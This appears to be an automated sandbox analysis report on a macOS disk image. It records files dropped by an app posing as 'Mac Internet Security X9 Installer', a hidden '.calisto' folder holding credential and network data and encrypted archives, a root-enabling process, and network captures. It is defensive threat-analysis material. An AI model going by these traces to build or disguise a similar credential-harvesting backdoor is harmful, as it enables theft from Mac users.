Encrypted:false
MD5:FEFC692EB19103027A6969D585334971
SHA1:7A158C19AAC1506ECAC647E618294820EEAD20D7
SHA-256:03F7CA3797BB98A4B2B021DE4637A172DC1DC5D3F93760C3B295DA1E272E4824
SHA-512:E4745CF47A8CA7D025085ED9D2866F56089A410B37AD73F4B153063E0635A4084482B379C4766BBB6A999E3E897889BF966687E7063439D3F28B5E29480C3791
Malicious:false
Reputation:low
/System/Library/CoreServices/launchb.app/Contents/Frameworks/CryptoSwift.framework/Versions/A/Resources/Info.plist
Process:/bin/cp
File Type:XML document text
Size (bytes):1234
Entropy (8bit):5.170382713609728
Encrypted:false
MD5:F44BE9A992E8B123ADEE3EBC8E3B6510
SHA1:DC77C7F46FA9BBA77937EC035211CB0E4DAC7653
SHA-256:68B0C2A1113D80FCD13C14176AD925A777813B09D2FC26ECBE2109D6FB218890
SHA-512:CD9E94B3199ED6CA433233D028488384B5B2FFD3633D713CA7119EC4AC2DF723B48EE1AC8B140F5AE5401D682547B6E6431A0AA1D0B2F668ABDD211FA6765F13
Malicious:false
Reputation:low
/System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftAppKit.dylib
Process:/bin/cp
File Type:Mach-O 64-bit dynamically linked shared library
Size (bytes):63744
Entropy (8bit):4.11057434510718
Encrypted:false
MD5:38759682CDB3A58F04622C41E57E8AB3
SHA1:BE6353ED10D052BA1CD12BE19631D8F1B5E4EDA0
SHA-256:F1CF169BA8ED1BC41B4D7CEA6F60F633C585BF9B3D0C8CFA2D5FD3E143490429
SHA-512:9CD6A43437BE259D75C3D0060D8F8D456182FB245F4E7B4489A51605FD3115FB6F412D7326E84E3C62AEF122AD73E7D95E3247D4AC4B0A09B1B54E4DB7BF70A0
Malicious:false
Reputation:low
/System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCore.dylib
Process:/bin/cp
File Type:Mach-O 64-bit dynamically linked shared library
Size (bytes):5013408
Entropy (8bit):6.376002392787888
Encrypted:false
MD5:7B2205B26DE401B8F0123233BADEC697
SHA1:AE7D9FA05E471865553A2080D9EBCBAD09087B28
SHA-256:8741500372A59C2459BAF8B773EA321028ADA75629808673A5E48200B7CBED30
SHA-512:87E0D82C84E314E7390B427D09BB7658314FBF707E5FFD09F410BD3AB9A8D63DCC4736108615A36C370E02A33ED3CF96E2815C7AF5679521659DF2145BF4AB29
Malicious:false
Reputation:low
/System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCoreData.dylib
Process:/bin/cp
File Type:Mach-O 64-bit dynamically linked shared library
Size (bytes):41024
Entropy (8bit):2.963110674978257
Encrypted:false
MD5:8691480D63DB10B7705316E8C9A053BA
SHA1:32F1606E9C693CB9E6A2C954AA245D5A05488858
SHA-256:6ED9A50225CAEA80DA01BB692ADB7611AE20E6CE8E61BF3D7B46606E9BFF9FEB
SHA-512:9C310414E4B606A048D67F50E90833253A1FB67F7578423E2F4A450F23DC86896C569BC1B6796BF03AA2CD1510CEFBCEB63AC102FB4FE3836B0F326D44453F3F
Malicious:false
Reputation:low
/System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCoreGraphics.dylib
Process:/bin/cp
File Type:Mach-O 64-bit dynamically linked shared library
Size (bytes):113968
Entropy (8bit):5.1916274693535
Encrypted:false
MD5:99FC355C64D7A6E81000CC92FF0E0767
SHA1:349D3019A28DA2B722742F5CF5FD63478E8B0E3E
SHA-256:2A16A14544292322F69BB134C5ECD665CA328BC5DA470AF50F9D5E03A164AC6C
SHA-512:A597F6B43BE33A5B84D23D263061BA6B55B77F6AECDC72613ECD4C53B5CF54D0D9CC7ED6C5181B0B043640A3F679D24933C227988619F572232E12194240FC62
Malicious:false
Reputation:low
/System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCoreImage.dylib
Process:/bin/cp
File Type:Mach-O 64-bit dynamically linked shared library
Size (bytes):30816
Entropy (8bit):2.25236625709208
Encrypted:false
MD5:5B5C9882C37E032DB49BFF7E2C55AE09
SHA1:57DD8082B89D73E6E11A97404DF7B97EC562CA9D
SHA-256:4132985B655ED2CAD950286E86A6C4C81E7B633604C6CAEFD3B69AF78C04A7A3
SHA-512:69C620B4462C6E60B670283E5246AAD2B91E26264A82B5731FD80B021728DB867C56AA435B7A039AFBAF2BB32F1CB21E7FB1E6805233B10A888F49738B4F519A
Malicious:false
Reputation:low
/System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftDarwin.dylib
Process:/bin/cp
File Type:Mach-O 64-bit dynamically linked shared library
Size (bytes):83408
Entropy (8bit):5.091838376796521
Encrypted:false
MD5:D8E364790528E013DA6C0B466B6F6139
SHA1:0611599B1A4C33C7E234E06594DF5E3DCD784318
SHA-256:5A49AF28ED46E7E3ABE01EF02FDD5A24E113C22BA55E60BFDD912AFB7A20E7D1
SHA-512:E399167F74E18E0572E4982613BDA54AFE42F4843074AC9DF932E66C3479B86353BD8DE95918F58F6B96ACBFF0054F9B213DC25F726C2C06DEADFBF3970B3430
Malicious:false
Reputation:low
/System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftDispatch.dylib
Process:/bin/cp
File Type:Mach-O 64-bit dynamically linked shared library
Size (bytes):36784
Entropy (8bit):3.2312635231360542
Encrypted:false
MD5:4F6267E0855B0B743BB71541C5611B1F
SHA1:807C7DFAF5645262566E626115CED0D22B21851E
SHA-256:C0B0812AAC040776AD21F486B1D555CF7BA0184CD09C0DC58B3CC01240D9C626
SHA-512:8BBAAC7CF56F3E394B5D1DF2C4D9FA0F986C546AAFD0B4F7BCC1422C8614B4ADB40F7CF9750A813133159D68CB670C615B7BCA4C45717819BD74D6D6CA718B06
Malicious:false
Reputation:low
/System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftFoundation.dylib
Process:/bin/cp
File Type:Mach-O 64-bit dynamically linked shared library
Size (bytes):526944
Entropy (8bit):6.198640221010398
Encrypted:false
MD5:4A217D1A09DA963D99686EDB2AC22FC9
SHA1:44D021FAB1CEBFB05C03F3F8D5E36F943FAB361E
SHA-256:084DA1AAF13F183839B1CB9132E82584382AE92AAA3BE4A7E67BA48184BF453D
SHA-512:E726809758E276DE9407D8DD7918E84C22E231E190B2A74472EA0410E20674A17CE455C0C2836589C6F84D37120B8D4E52E9A0C7994779AD479AE1170B51BB68
Malicious:false
Reputation:low
/System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftObjectiveC.dylib
Process:/bin/cp
File Type:Mach-O 64-bit dynamically linked shared library
Size (bytes):64352
Entropy (8bit):4.959067585191851
Encrypted:false
MD5:707889C9A4FD59DC39D72ECF19878B92
SHA1:D4C6A60A3C029D7AC13C98DFEEB47D9F2119639E
SHA-256:FA6C3D1B859E969A4228C4EB78D7260AA30E7D5235149D3B73D4341DB762EB35
SHA-512:7B053EF9B02A52B74FBD185D33A43A296FDECA6ED3040D2474EB9BF002534D91C70507CD204215E4EF372A39F4671610C2C90985C7D58E3664EA77AD8FE2CD19
Malicious:false
Reputation:low
/System/Library/CoreServices/launchb.app/Contents/Info.plist
Process:/bin/cp
File Type:XML document text
Size (bytes):1187
Entropy (8bit):5.133480514747447
Encrypted:false
MD5:0DD3BCFD61DE5C74F0B4E1D655BD69A6
SHA1:8B02CA627ABFD63C76BC8C564754DD8D6C239243
SHA-256:3DF212F108B2F3032C77C2F2149EE49C52B606F314C259CEABEC3DFE3C457720
SHA-512:BD3233EA0106432A0882BA819DE6315B9AB3132A24A7D78DD21EE627EF3A05ECF40AF1B855FCEA7E7A50B3FF6BFDB0A506E20F2974F8D048442D8E19D2BC97FE
Malicious:true
Reputation:low
/System/Library/CoreServices/launchb.app/Contents/MacOS/Mac Internet Security X9 Installer
Process:/bin/cp
File Type:Mach-O 64-bit executable
Size (bytes):120400
Entropy (8bit):5.889550055521007
Encrypted:false
MD5:2F38B201F6B368D587323A1BEC516E5D
SHA1:E7324478AFC9092E1AAF1D50F7D03470D1416C2A
SHA-256:81C127C3CCEAF44DF10BB3CEB20CE1774F6A9EAD0DB4BD991ABF39DB828661CC
SHA-512:A296E6BD864068BBC4F2CF3DD5006ED8BC2B4993E5247DCB2B29A19744B6A42CD5380190C7CE306A1825A8A6CC3FCA23BF0442708F88DB7105460A984E9534EA
Malicious:true
Reputation:low
/System/Library/CoreServices/launchb.app/Contents/PkgInfo
Process:/bin/cp
File Type:ASCII text, with no line terminators
Size (bytes):8
Entropy (8bit):1.75
Encrypted:false
MD5:23B7D7D024ABB0F558420E098800BF27
SHA1:9F9EEA0CFE2D65F2C3D6B092E375B40782D08F31
SHA-256:82502191C9484B04D685374F9879A0066069C49B8ACAE7A04B01D38D07E8ECA0
SHA-512:F77D501528DD0CED155C80406CFBEE38D5D3649B64D2A9324F3D6CEE39491EB8F54CDEBAE49C6E21A20D2309D8FAE1B01C41631224811E73483DB25A2695738C
Malicious:false
Reputation:low
/System/Library/CoreServices/launchb.app/Contents/Resources/AppIcon.icns
Process:/bin/cp
File Type:data
Size (bytes):1124765
Entropy (8bit):7.989621881944246
Encrypted:false
MD5:A9FA0056BBA3C46CA80ED0D4AB416B76
SHA1:FC11EA90BA8D32765A507CC0CAEC07CB9C141B1E
SHA-256:A7D741D75E3CD6DD2AE7540F3C8F1419BB0075C814EB8243407AD64523E16712
SHA-512:4710CEEA2ED978280B32ECD5189854328628EDD024A94032773B1D08829DAC0D988B9A33854E7F244F557FA3FDDCFD1A17FB315A721B259E2E0655103BC21580
Malicious:false
Reputation:low
/System/Library/CoreServices/launchb.app/Contents/Resources/Assets.car
Process:/bin/cp
File Type:Mac OS X bill of materials (BOM) file
Size (bytes):112067
Entropy (8bit):6.502668027921092
Encrypted:false
MD5:76DBD78DBD82EFF35C398C05C45136A4
SHA1:A34CE08E214E6A622D41758961D0A216D2B3BD86
SHA-256:1E803EA840DC4CD6407E03AE183C1A18838FD634F0704C7476DEA056504BE009
SHA-512:9543C1A2C2E201366D737A3ACC0FE09D3902D6C85E833D35732A3F97E56A97705FD77A2272A0F21A002B54E68D567A1103651B6D5C6F273F7D7D5F6F05DF2756
Malicious:false
Reputation:low
/System/Library/CoreServices/launchb.app/Contents/Resources/Base.lproj/Main.storyboardc/Info.plist
Process:/bin/cp
File Type:Apple binary property list
Size (bytes):445
Entropy (8bit):5.495199930846643
Encrypted:false
MD5:C8EEC75C6213277CFE94FCF8CE26AA2F
SHA1:C2BBD4E69B4B0D67071BC16F0F2036FB9BFD6215
SHA-256:D276D18D77B5E4300E8C40F883D0A221E0CB16002B72C03056616C8445354CF5
SHA-512:F71805FA1A2CA4A8ADE23570B25B4123808170C5ACD82E4FD195E6A59558A194D8F1636002F7CBF4C308C50A01E947D9007F6ECE416576A6558F653C0A47B85F
Malicious:false
Reputation:low
/System/Library/CoreServices/launchb.app/Contents/Resources/Base.lproj/Main.storyboardc/MainMenu.nib
Process:/bin/cp
File Type:Apple binary property list
Size (bytes):35015
Entropy (8bit):7.010269287300276
Encrypted:false
MD5:BFC03DA30542D25DD74ABDBC1DCC9F03
SHA1:3E841C8621E68BC44FF0F6808AD085E43EFC6BC7
SHA-256:1A0DAA23869041E1F4E2A4B4FA084A4D782BC4698B527172F8EE01217DA1FA4F
SHA-512:9987B9D7DE260A34D468149D2DA2DDB6E3DD3F1A2A7F6460E9AADD23C778C8C9786A48E476FAFF4D4C3FC3C0EF85762841E14C16D9BEB8395804E453E12245DB
Malicious:false
Reputation:low
/System/Library/CoreServices/launchb.app/Contents/Resources/Base.lproj/Main.storyboardc/NSWindowController-B8D-0N-5wS.nib
Process:/bin/cp
File Type:Apple binary property list
Size (bytes):3426
Entropy (8bit):6.456663698639114
Encrypted:false
MD5:8997604E6F15EFF615ACA230FEF58126
SHA1:4465EF1A2EDEE5C8878C5AA00D96E3D471BEDA92
SHA-256:0B0A06AB922F2AE5E2CE1C2C480046FF6B4311A73DC3152D2B97CFD08E9ADBBD
SHA-512:1F160138CA3EE0466C2C78DF664EE08B1F91C319E8245244FE25A662FB25563157D8CC2CDA9928579CBEB3F9405A9023D2D7096DD9D9D57476A913CD47BEF239
Malicious:false
Reputation:low
/System/Library/CoreServices/launchb.app/Contents/Resources/Base.lproj/Main.storyboardc/XfG-lQ-9wD-view-m2S-Jp-Qdl.nib
Process:/bin/cp
File Type:Apple binary property list
Size (bytes):9425
Entropy (8bit):6.719222232477517
Encrypted:false
MD5:225C7431B98E136C67108741BD634881
SHA1:28FEB7D6C98891D0161309BE1D5DDF16863EB5E9
SHA-256:1EFF7417B0A78B3904BC747C3AB52278908F99131CC38B438046CEB91BF605C8
SHA-512:B7D1FA6964B457823446D8F9ADEC6C0A74CC43052B50B62A235E1CFF1B2A00B2EB8C66F94ECCF4D7113A4F7030A02418E2D48CE7A124515940C6D3035B4C4D62
Malicious:false
Reputation:low
/System/Library/CoreServices/launchb.app/Contents/Resources/InfoL.plist
Process:/bin/cp
File Type:XML document text
Size (bytes):1187
Entropy (8bit):5.133480514747447
Encrypted:false
MD5:0DD3BCFD61DE5C74F0B4E1D655BD69A6
SHA1:8B02CA627ABFD63C76BC8C564754DD8D6C239243
SHA-256:3DF212F108B2F3032C77C2F2149EE49C52B606F314C259CEABEC3DFE3C457720
SHA-512:BD3233EA0106432A0882BA819DE6315B9AB3132A24A7D78DD21EE627EF3A05ECF40AF1B855FCEA7E7A50B3FF6BFDB0A506E20F2974F8D048442D8E19D2BC97FE
Malicious:true
Reputation:low
/System/Library/CoreServices/launchb.app/Contents/Resources/com.intego.Mac-Internet-Security-X9-Installer.plist
Process:/bin/cp
File Type:XML document text
Size (bytes):463
Entropy (8bit):5.264417143708243
Encrypted:false
MD5:CE283374782831F346661E89AB37972E
SHA1:3F21D478FE3ED0ED88C30764D13A8A32E11B5475
SHA-256:231D8CFF7F6D6181FB35B19C69A27E3F682A1408D891D58AAB5CB48996F25AED
SHA-512:B5F8B0BFEFA02B1F089B79A105497F6DECCC17FFBFB0BE55ED16EF92E3E5A7474C0F18FEA3BE631231212E7E83D97A90BE6AA8E6EEE7B98B3227A6F93F62F493
Malicious:true
Reputation:low
/Users/henry/.calisto/cred.dat
Process:/bin/bash
File Type:ASCII text
Size (bytes):6
Entropy (8bit):2.584962500721156
Encrypted:false
MD5:C04EF8A3C5ED50A0C21B7E2ED1B98C11
SHA1:AC78A2F2BE9CD032A4657E1DBAA34E00D5332C62
SHA-256:A3B32EBDE05AC5A8DFF8FDF984B4148400BF2BAD7FB53762FC6CA68CFEF3E02F
SHA-512:666183C247403BC65186B374CEB6279794110B09C72FAA428715416ED52027DF111A6D6A87961A762771B29AD7D1DF642F11E8561292839A4F366B87C5B969C2
Malicious:false
Reputation:low
/Users/henry/.calisto/network.dat
Process:/sbin/ifconfig
File Type:ASCII text
Size (bytes):1792
Entropy (8bit):5.576345565821217
Encrypted:false
MD5:EABDA0D9CA7D66252584EAB8278739A3
SHA1:0C4694A3B53D16D1A8F8CC7EE7518F782FFBFFF4
SHA-256:C632E9F12AA904FD50935A1EC0DB5E1FFE0FDACD6452BE5BFEB4CF4031CF3E3F
SHA-512:B2BB9ADEFC70D635D64FA1AF5D075A46FBC40CC11F93797EC64DEEEC08294AA990CD6442208CFEB873A614B07DCF1BE6643DF44F2DDE8FD7429AD23AC8BB0B75
Malicious:true
Reputation:low
/Users/henry/.calisto/zi415Fng
Process:/usr/bin/zip
File Type:Zip archive data, at least v1.0 to extract
Size (bytes):6472310
Entropy (8bit):7.998827099921624
Encrypted:true
MD5:A8A09C12E3C6833DC648F2DBA358B271
SHA1:F340B024A1B023702D216D19A2FC5F2331C6CCC1
SHA-256:B7C02E4558989B380779976F64A7B45A3F47C08307B051CAAF3F4004AF196E55
SHA-512:3E2F24A49B3E28609CC632D18895EDA4FFCF50269ECE99A4B52CBFF35D30F8D125D00B2B3F0F7909E0DFBB424425AD2569F263D1D9F2D003DEC785E048DFB36F
Malicious:false
Reputation:low
/Users/henry/.calisto/zi6c7T1o
Process:/usr/bin/zip
File Type:Zip archive data, at least v1.0 to extract
Size (bytes):6472600
Entropy (8bit):7.998823430266608
Encrypted:true
MD5:3DE6560E380F1555989496C133A684BA
SHA1:3EA5737ED702421F489398AF0DB39243C723AE8D
SHA-256:32E410557D1CA7489DEB321EEBB9532E20F036CECA5D5CDBD65CB107A08664AD
SHA-512:62F1C403ECCE4539503D1709BAEEA5850ECA7415BEA581B309CA626CC5470E776BDCF2317DACE7139C1BF543822DCB93E5FF3FFD4C16C98683431628738F6FF7
Malicious:false
Reputation:low
/dev/null
Process:/usr/sbin/dsenableroot
File Type:ASCII text
Size (bytes):37
Entropy (8bit):3.7533911229011876
Encrypted:false
MD5:513CD5A109EF66DE4FD2484236CEB0A9
SHA1:F49BE29C5509AF3C62757135C3155E9551AED272
SHA-256:FB9BDCA09290D4D0472EC933A40BA7A7A4D4E32EB173B83D5546654882C827DA
SHA-512:23C6EF7BDF8D879DA7C00298537E794FCFA2F660B950CB2C70D800A1BA65A3A52AB2F4F5785085425A8DDD535D1BD2317FDBC013FB2B71A8A4536672C0439EE2
Malicious:false
Reputation:low

Contacted Domains/Contacted IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
mesu.g.aaplimg.com17.253.57.208truefalseunknown

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IPCountryFlagASNASN NameMalicious
17.253.57.208United States
6185APPLE-AUSTIN-AppleIncUSfalse

Static File Info

General

File type:data
Entropy (8bit):7.992892927976453
TrID:
  • Disk Image (Macintosh), zlib, GPT (10001/1) 60.59%
  • Pixlr layered image (2002/1) 12.13%
  • Pivot stickfigure animation (2002/1) 12.13%
  • Java Script embedded in Visual Basic Script (1500/0) 9.09%
  • XMill compressed XML (1001/1) 6.06%
File name:FmTmHujm4o.dmg
File size:5188982
MD5:d7ac1b8113c94567be4a26d214964119
SHA1:55800dc173d80a8a4ab7685b0a4f212900778fa0
SHA256:0ec3b65534ef09f83b3f43d93b015a7a2cc2534c5f7f251400c5227fd1cabad9
SHA512:e8b05eae0b064c49899238287ca7d1ba66b90c7e6a250b25f316d45b4f1709bd6e1f0b473595d8a83a3bf51c5df98767e8d12e1fcfa8f346d35b2046f9dd864c
File Content Preview:x.c`..C.......3......=t...[..x.su.T.p..a``d.a``.}..<... ..q..........JT......{Ru|..&.|..3...f..........x.........._!..).h.^............N.,.......J.@..........-.".j._..s..uy.....4......&u..2...:.T...................Z...x......W}...{w........8.H.;qr...o..l_

Network Behavior

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Jul 26, 2018 16:36:39.406042099 MESZ5889253192.168.0.508.8.8.8
Jul 26, 2018 16:36:39.430913925 MESZ53588928.8.8.8192.168.0.50
Jul 26, 2018 16:36:39.431993961 MESZ49263443192.168.0.5017.253.57.208
Jul 26, 2018 16:36:39.442425013 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.442651033 MESZ49263443192.168.0.5017.253.57.208
Jul 26, 2018 16:36:39.442992926 MESZ49263443192.168.0.5017.253.57.208
Jul 26, 2018 16:36:39.453665972 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.454521894 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.454570055 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.454763889 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.454788923 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.454866886 MESZ49263443192.168.0.5017.253.57.208
Jul 26, 2018 16:36:39.455008030 MESZ49263443192.168.0.5017.253.57.208
Jul 26, 2018 16:36:39.468066931 MESZ49263443192.168.0.5017.253.57.208
Jul 26, 2018 16:36:39.478601933 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.479036093 MESZ49263443192.168.0.5017.253.57.208
Jul 26, 2018 16:36:39.483406067 MESZ49263443192.168.0.5017.253.57.208
Jul 26, 2018 16:36:39.494107962 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.494354010 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.494457960 MESZ49263443192.168.0.5017.253.57.208
Jul 26, 2018 16:36:39.494466066 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.494573116 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.494682074 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.494784117 MESZ49263443192.168.0.5017.253.57.208
Jul 26, 2018 16:36:39.494856119 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.494891882 MESZ49263443192.168.0.5017.253.57.208
Jul 26, 2018 16:36:39.494961977 MESZ49263443192.168.0.5017.253.57.208
Jul 26, 2018 16:36:39.494962931 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.495080948 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.495141983 MESZ49263443192.168.0.5017.253.57.208
Jul 26, 2018 16:36:39.495188951 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.495345116 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.495373011 MESZ49263443192.168.0.5017.253.57.208
Jul 26, 2018 16:36:39.495455027 MESZ49263443192.168.0.5017.253.57.208
Jul 26, 2018 16:36:39.505283117 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.505330086 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.505523920 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.505631924 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.505740881 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.505767107 MESZ49263443192.168.0.5017.253.57.208
Jul 26, 2018 16:36:39.505846977 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.505899906 MESZ49263443192.168.0.5017.253.57.208
Jul 26, 2018 16:36:39.506030083 MESZ49263443192.168.0.5017.253.57.208
Jul 26, 2018 16:36:39.506118059 MESZ49263443192.168.0.5017.253.57.208
Jul 26, 2018 16:36:39.506242990 MESZ49263443192.168.0.5017.253.57.208
Jul 26, 2018 16:36:39.506654024 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.506745100 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.506860971 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.506964922 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.507074118 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.507122993 MESZ49263443192.168.0.5017.253.57.208
Jul 26, 2018 16:36:39.507185936 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.507234097 MESZ49263443192.168.0.5017.253.57.208
Jul 26, 2018 16:36:39.507292986 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.507363081 MESZ49263443192.168.0.5017.253.57.208
Jul 26, 2018 16:36:39.507405043 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.507426977 MESZ49263443192.168.0.5017.253.57.208
Jul 26, 2018 16:36:39.507513046 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.507524967 MESZ49263443192.168.0.5017.253.57.208
Jul 26, 2018 16:36:39.507622004 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:39.507780075 MESZ49263443192.168.0.5017.253.57.208
Jul 26, 2018 16:36:39.507849932 MESZ49263443192.168.0.5017.253.57.208
Jul 26, 2018 16:36:41.456368923 MESZ49263443192.168.0.5017.253.57.208
Jul 26, 2018 16:36:41.456701994 MESZ49263443192.168.0.5017.253.57.208
Jul 26, 2018 16:36:41.467088938 MESZ4434926317.253.57.208192.168.0.50
Jul 26, 2018 16:36:41.467344999 MESZ49263443192.168.0.5017.253.57.208
Jul 26, 2018 16:40:49.333496094 MESZ4949053192.168.0.508.8.8.8
Jul 26, 2018 16:40:49.338985920 MESZ53494908.8.8.8192.168.0.50

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Jul 26, 2018 16:36:39.406042099 MESZ5889253192.168.0.508.8.8.8
Jul 26, 2018 16:36:39.430913925 MESZ53588928.8.8.8192.168.0.50
Jul 26, 2018 16:40:49.333496094 MESZ4949053192.168.0.508.8.8.8
Jul 26, 2018 16:40:49.338985920 MESZ53494908.8.8.8192.168.0.50

DNS Queries

TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
Jul 26, 2018 16:36:39.406042099 MESZ192.168.0.508.8.8.80xad21Standard query (0)mesu.g.aaplimg.comA (IP address)IN (0x0001)

DNS Answers

TimestampSource IPDest IPTrans IDReplay CodeNameCNameAddressTypeClass
Jul 26, 2018 16:36:39.430913925 MESZ8.8.8.8192.168.0.500xad21No error (0)mesu.g.aaplimg.com17.253.57.208A (IP address)IN (0x0001)
Jul 26, 2018 16:36:39.430913925 MESZ8.8.8.8192.168.0.500xad21No error (0)mesu.g.aaplimg.com17.253.55.212A (IP address)IN (0x0001)

HTTPS Packets

TimestampSource PortDest PortSource IPDest IPSubjectIssuerNot BeforeNot AfterRaw
Jul 26, 2018 16:36:39.454763889 MESZ4434926317.253.57.208192.168.0.50C=US, ST=California, O=Apple Inc., OU=management:idms.group.665035, CN=mesu.apple.comC=US, O=Apple Inc., OU=Certification Authority, CN=Apple IST CA 8 - G1Thu Feb 01 02:31:18 CET 2018Mon Mar 02 02:31:18 CET 2020[[ Version: V3 Subject: C=US, ST=California, O=Apple Inc., OU=management:idms.group.665035, CN=mesu.apple.com Signature Algorithm: SHA256withECDSA, OID = 1.2.840.10045.4.3.2 Key: Sun EC public key, 256 bits public x coord: 5310736210901874388218149206230387333347937540451348876501930082404457239492 public y coord: 2346029493496550027973013547984801761857392266799258304744613263070039308763 parameters: secp256r1 [NIST P-256, X9.62 prime256v1] (1.2.840.10045.3.1.7) Validity: [From: Thu Feb 01 02:31:18 CET 2018, To: Mon Mar 02 02:31:18 CET 2020] Issuer: C=US, O=Apple Inc., OU=Certification Authority, CN=Apple IST CA 8 - G1 SerialNumber: [ 4d5c80e3 37f1c875]Certificate Extensions: 9[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://certs.apple.com/appleistca8g1.der, accessMethod: ocsp accessLocation: URIName: http://ocsp.apple.com/ocsp03-appleistca8g101]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: C3 C4 A4 58 05 63 D7 83 06 BA 96 8D DC B2 8F 32 ...X.c.........20010: F6 BB B7 41 ...A]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.apple.com/appleistca8g1.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.2.840.113635.100.5.11.4][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.2 qualifier: 0000: 30 81 97 0C 81 94 52 65 6C 69 61 6E 63 65 20 6F 0.....Reliance o0010: 6E 20 74 68 69 73 20 63 65 72 74 69 66 69 63 61 n this certifica0020: 74 65 20 62 79 20 61 6E 79 20 70 61 72 74 79 20 te by any party 0030: 61 73 73 75 6D 65 73 20 61 63 63 65 70 74 61 6E assumes acceptan0040: 63 65 20 6F 66 20 61 6E 79 20 61 70 70 6C 69 63 ce of any applic0050: 61 62 6C 65 20 74 65 72 6D 73 20 61 6E 64 20 63 able terms and c0060: 6F 6E 64 69 74 69 6F 6E 73 20 6F 66 20 75 73 65 onditions of use0070: 20 61 6E 64 2F 6F 72 20 63 65 72 74 69 66 69 63 and/or certific0080: 61 74 69 6F 6E 20 70 72 61 63 74 69 63 65 20 73 ation practice s0090: 74 61 74 65 6D 65 6E 74 73 2E tatements.], PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.2 qualifier: 0000: 30 2C 0C 2A 68 74 74 70 3A 2F 2F 77 77 77 2E 61 0,.*http://www.a0010: 70 70 6C 65 2E 63 6F 6D 2F 63 65 72 74 69 66 69 pple.com/certifi0020: 63 61 74 65 61 75 74 68 6F 72 69 74 79 2F cateauthority/]] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_Agreement][8]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: mesu.apple.com][9]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 39 9E 2C AD 5D 59 FA 70 49 D2 41 B5 0D 1F 8E 8F 9.,.]Y.pI.A.....0010: 94 1D 28 96 ..(.]]] Algorithm: [SHA256withECDSA] Signature:0000: 30 45 02 21 00 EE 06 33 09 1B C2 7A BB 81 84 45 0E.!...3...z...E0010: 04 19 B0 BC C2 8C 2E 26 80 BC 56 CF 5D ED 09 86 .......&..V.]...0020: 1B B4 63 FD 2A 02 20 0B 0D 35 31 4A 42 A3 07 5B ..c.*. ..51JB..[0030: 4D 63 80 DD F8 25 6F BC EA 52 40 0C 56 5C D4 07 Mc...%o..R@.V\..0040: 9E 8B 8C 9F 32 98 74 ....2.t]
